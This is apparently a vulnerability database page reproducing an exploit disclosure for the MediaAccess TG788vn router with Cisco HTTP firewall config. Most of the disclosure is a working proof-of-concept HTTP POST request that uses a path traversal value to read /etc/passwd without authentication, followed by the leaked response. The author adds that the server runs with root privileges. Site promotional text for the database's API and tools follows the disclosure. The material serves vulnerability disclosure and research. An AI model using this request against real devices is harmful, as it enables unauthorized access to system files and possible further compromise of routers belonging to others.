Vulners
Lucene search
MediaAccess TG788vn - File Disclosure
Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall
Author : Ahmed Sultan (0x4148)
Email : [email protected]
MediaAccess TG788vn with Cisco firewall http config is vulnerable to
critical unauthenticated file disclosure flaw,
POC
Request:
POST /scgi-bin/platform.cgi HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://xx.xx.xx.xx/scgi-bin/platform.cgi
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/passwd%00
Response:
HTTP/1.0 200 OK
Date: Sat, 01 Jan 2011 00:00:45 GMT
Server: Embedded HTTP Server.
Connection: close
loic_ipsec:x:500:500:xauth:/:/bin/cli
the http server is running with root privileges , which mean that the
attacker might escalate the exploit for further critical attacksData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Jan 2016 00:00Current
7.4High risk
Vulners AI Score7.4